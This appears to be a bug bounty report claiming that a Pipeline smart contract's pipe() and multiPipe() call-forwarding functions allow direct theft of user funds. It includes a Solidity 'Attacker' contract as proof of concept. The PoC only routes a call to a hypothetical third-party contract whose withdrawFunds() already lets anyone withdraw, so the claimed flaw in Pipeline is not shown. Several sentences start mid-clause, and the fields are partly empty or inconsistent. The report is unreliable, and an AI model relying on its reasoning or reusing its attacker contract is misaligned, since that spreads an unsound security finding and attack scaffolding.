Report #14504

Report ID

#14504

Target

https://etherscan.io/address/0xb1bE0000bFdcDDc92A8290202830C4Ef689dCeaa

Report type

Smart Contract

Impacts

Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Has PoC?

Yes

The pipeline contract allows users to call any function on other protocols through the pipe() and multiPipe() functions. This means that an attacker could call a function on another contract that allows them to transfer funds out of that contract.

allows anyone to withdraw funds, an attacker could call that function through the pipeline contract and steal the funds from the other contract.

Difficulty to Exploit: Medium Weakness: CVSS2 Score: 6

to include a requirement for users to provide proof of ownership of the funds they are attempting to transfer through the pipe() or multiPipe() functions.

// Attacker contract contract Attacker { // Address of the Pipeline contract address pipelineAddress; // Address of the vulnerable contract address vulnerableAddress;

constructor(address _pipelineAddress, address _vulnerableAddress) public { pipelineAddress = _pipelineAddress; vulnerableAddress = _vulnerableAddress; }

// Function to call the vulnerable contract's withdrawFunds() function //through the Pipeline contract

function attack() public { // Create a PipeCall struct with the target set to the vulnerable contract's //address and the calldata set to the ABI-encoded withdrawFunds() //function call PipeCall memory call = PipeCall({ target: vulnerableAddress, data: abi.encodeWithSignature("withdrawFunds()") });

// Call the pipe() function on the Pipeline contract to execute the function //call on the vulnerable contract, which would allow the attacker to steal all of //the vulnerable contract's funds. IPipeline(pipelineAddress).pipe(call); } }